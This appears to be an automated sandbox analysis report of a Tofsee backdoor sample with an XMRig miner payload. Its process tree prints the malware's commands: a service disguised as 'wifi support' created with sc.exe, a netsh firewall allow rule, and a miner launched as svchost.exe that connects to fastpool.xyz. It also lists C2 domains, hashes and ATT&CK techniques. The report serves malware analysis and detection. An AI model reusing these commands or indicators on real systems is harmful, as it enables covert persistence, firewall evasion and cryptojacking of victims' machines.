Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    19-06-2022 05:10

General

  • Target

    2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e.exe

  • Size

    299KB

  • MD5

    c65453888ba36756943894d3282563fc

  • SHA1

    130a0daff88260539c16d66049efb9f0f40e019d

  • SHA256

    2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e

  • SHA512

    e334ddfd4e070ed320d0352335519e52a1155e49d748571123d4be2ac6d944d5a503d43ea64445e21a5e6191256beb553d3c7f0b07cb73a6944778b8cf8d874b

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e.exe
    "C:\Users\Admin\AppData\Local\Temp\2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kfpagtcb\
      2⤵
        PID:740
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xfctzdep.exe" C:\Windows\SysWOW64\kfpagtcb\
        2⤵
          PID:3604
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kfpagtcb binPath= "C:\Windows\SysWOW64\kfpagtcb\xfctzdep.exe /d\"C:\Users\Admin\AppData\Local\Temp\2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1920
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description kfpagtcb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1104
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start kfpagtcb
          2⤵
          • Launches sc.exe
          PID:224
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3944
      • C:\Windows\SysWOW64\kfpagtcb\xfctzdep.exe
        C:\Windows\SysWOW64\kfpagtcb\xfctzdep.exe /d"C:\Users\Admin\AppData\Local\Temp\2bf4ef082121003e7e9e9ff018dc5a4690538598366543223a9ed5557a9d867e.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3204
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1308
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1616

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\xfctzdep.exe
        Filesize

        14.3MB

        MD5

        4c23d4a89a020af01262bf76de688bf4

        SHA1

        c33a239c4e673c1cc1879fd61c819f71049bffc6

        SHA256

        ad1f83e99e19938d9c902f80dd394a04cd3b145d5bd95efbb3c76be22e4407cb

        SHA512

        76aad319e44e51d5dd22ed3d0ff5114232693b4bd2c08d8256bdc69b3c106fd49234be7b5112eb40ecd34fa7ceae8735514e3224a02abf6d3ef03d11463a2f77

      • C:\Windows\SysWOW64\kfpagtcb\xfctzdep.exe
        Filesize

        14.3MB

        MD5

        4c23d4a89a020af01262bf76de688bf4

        SHA1

        c33a239c4e673c1cc1879fd61c819f71049bffc6

        SHA256

        ad1f83e99e19938d9c902f80dd394a04cd3b145d5bd95efbb3c76be22e4407cb

        SHA512

        76aad319e44e51d5dd22ed3d0ff5114232693b4bd2c08d8256bdc69b3c106fd49234be7b5112eb40ecd34fa7ceae8735514e3224a02abf6d3ef03d11463a2f77

      • memory/224-204-0x0000000000000000-mapping.dmp
      • memory/740-170-0x0000000000000000-mapping.dmp
      • memory/740-180-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/740-174-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/740-173-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/740-172-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/740-171-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1104-190-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1104-189-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1104-188-0x0000000000000000-mapping.dmp
      • memory/1120-161-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-166-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-132-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-133-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-134-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-135-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-136-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-137-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-138-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-139-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-140-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-142-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-143-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-144-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-145-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-146-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-147-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-148-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-149-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-150-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-151-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-152-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-153-0x0000000002C70000-0x0000000002D1E000-memory.dmp
        Filesize

        696KB

      • memory/1120-154-0x0000000002E10000-0x0000000002E23000-memory.dmp
        Filesize

        76KB

      • memory/1120-155-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-156-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-157-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-158-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-159-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-160-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-118-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-162-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-163-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-164-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-165-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-131-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-168-0x0000000000400000-0x0000000002C6A000-memory.dmp
        Filesize

        40.4MB

      • memory/1120-167-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-169-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-130-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-129-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-128-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-127-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-126-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-242-0x0000000000400000-0x0000000002C6A000-memory.dmp
        Filesize

        40.4MB

      • memory/1120-230-0x0000000002E10000-0x0000000002E23000-memory.dmp
        Filesize

        76KB

      • memory/1120-119-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-120-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-121-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-125-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-122-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-124-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1120-123-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1308-488-0x0000000000740000-0x0000000000755000-memory.dmp
        Filesize

        84KB

      • memory/1308-365-0x0000000000740000-0x0000000000755000-memory.dmp
        Filesize

        84KB

      • memory/1308-290-0x0000000000749A6B-mapping.dmp
      • memory/1616-512-0x00000000004B259C-mapping.dmp
      • memory/1920-185-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1920-184-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1920-186-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1920-187-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/1920-182-0x0000000000000000-mapping.dmp
      • memory/3204-275-0x0000000002F26000-0x0000000002F33000-memory.dmp
        Filesize

        52KB

      • memory/3204-296-0x0000000002F26000-0x0000000002F33000-memory.dmp
        Filesize

        52KB

      • memory/3204-313-0x0000000000400000-0x0000000002C6A000-memory.dmp
        Filesize

        40.4MB

      • memory/3604-176-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/3604-175-0x0000000000000000-mapping.dmp
      • memory/3604-177-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/3604-178-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/3604-179-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/3604-181-0x00000000775D0000-0x000000007775E000-memory.dmp
        Filesize

        1.6MB

      • memory/3944-225-0x0000000000000000-mapping.dmp